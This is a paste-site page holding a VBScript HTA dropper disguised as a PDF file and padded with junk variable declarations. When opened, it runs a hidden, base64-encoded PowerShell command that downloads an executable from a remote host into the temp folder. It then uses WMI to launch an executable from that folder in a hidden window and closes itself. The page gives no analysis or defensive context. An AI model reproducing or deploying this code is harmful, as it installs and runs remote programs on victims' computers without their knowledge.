avatar
Untitled

Guest 176 16th Jun, 2019

MARKUP 2.78 KB
                                           
                         %PD<script LAnGUaGE="VBScrIPt">

    Function PinkPandasOfChina()
		Dim Sheelll
        Dim binlanderDDe121
		Dim binlanderDDe1211
		Dim binlanderDDe1212
		Dim binlanderDDe1213
		Dim binlanderDDe1214
		Dim binlanderDDe1215
		Dim binlanderDDe1216
		Dim binlanderDDe1217
		Dim binlanderDDe1218
		Dim binlanderDDe1219
		Dim binlanderDDe12199
        Set binlanderDDe121 = CreateObject("Wscript.Shell")
        Dim binlanderDDe121999
		Dim binlanderDDe1211999
		Dim binlanderDDe1212999
		Dim binlanderDDe1213999
		Dim binlanderDDe1214999
		Dim binlanderDDe1215999
		Dim binlanderDDe1216999
		Dim binlanderDDe1217999
		Dim binlanderDDe1218999
		Dim binlanderDDe12199999999
		Dim binlanderDDe121999999
		temp = binlanderDDe121.expandEnvironmentStrings("%TmP%")
		Dim binlanderDDe1219888
		Dim binlanderDDe121108888
		Dim binlanderDDe121118888
		Dim binlanderDDe121128888
		Dim binlanderDDe121138888
		Dim binlanderDDe121148888
		Dim binlanderDDe121108888888
		Dim binlanderDDe121118888888
		Dim binlanderDDe1211288888888
		Dim binlanderDDe12113888888888
		Dim binlanderDDe121148888888888
        binlanderDDe121.run "powershell -noprofile -noni -W Hidden -enc aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAGYAaQBsAGUAKAAiAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQAuAGUAYQByAHQAaAAuAGwAaQAvAH4AcwBnAHQAYQB0AGgAYQBtAC8AcAB1AHQAdAB5AC8AbABhAHQAZQBzAHQALwB3ADMAMgAvAHAAdQB0AHQAeQAuAGUAeABlACIALAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAYgBhAGsAZAByAGEAdwAuAGUAeABlACIAKQApADsA", 0, true
		Dim binlanderDDe1219666666666666666
		Dim binlanderDDe121105555
		Dim binlanderDDe121115555
		Dim binlanderDDe121125555
		Dim binlanderDDe121135555
		Dim binlanderDDe121145555
		Dim binlanderDDe1211055558
		Dim binlanderDDe1211155588888
		Dim binlanderDDe12112555558888
		Dim binlanderDDe12113555588888
		Dim binlanderDDe1211455558888
		Dim binlanderDDe12110555599999
		Dim binlanderDDe1211155559999
		Dim binlanderDDe12112555559999
		Dim binlanderDDe1211355559999
		Dim binlanderDDe1211433333
	End Function
	Sub window_onload
	const impersonation = 3
	Const HIDDEN_WINDOW = 12
	Set Locator = CreateObject("WbemScripting.SWbemLocator")
	Set Service = Locator.ConnectServer()
	Service.Security_.ImpersonationLevel=impersonation
	Set objStartup = Service.Get("Win32_ProcessStartup")
	Set objConfig = objStartup.SpawnInstance_
	objConfig.ShowWindow = HIDDEN_WINDOW
	Set Process = Service.Get("Win32_Process")	
		Error = Process.Create("CMd /c %TmP%\avantfirewall.exe", null, objConfig, intProcessID)
	window.close()
end sub
	

    PinkPandasOfChina
    self.close
</script>
%%EOF
                      
                                       
To share this paste please copy this url and send to your friends
RAW Paste Data

Comments

Authentication required

You must log in to post a comment.

Log in
    There are no comments yet.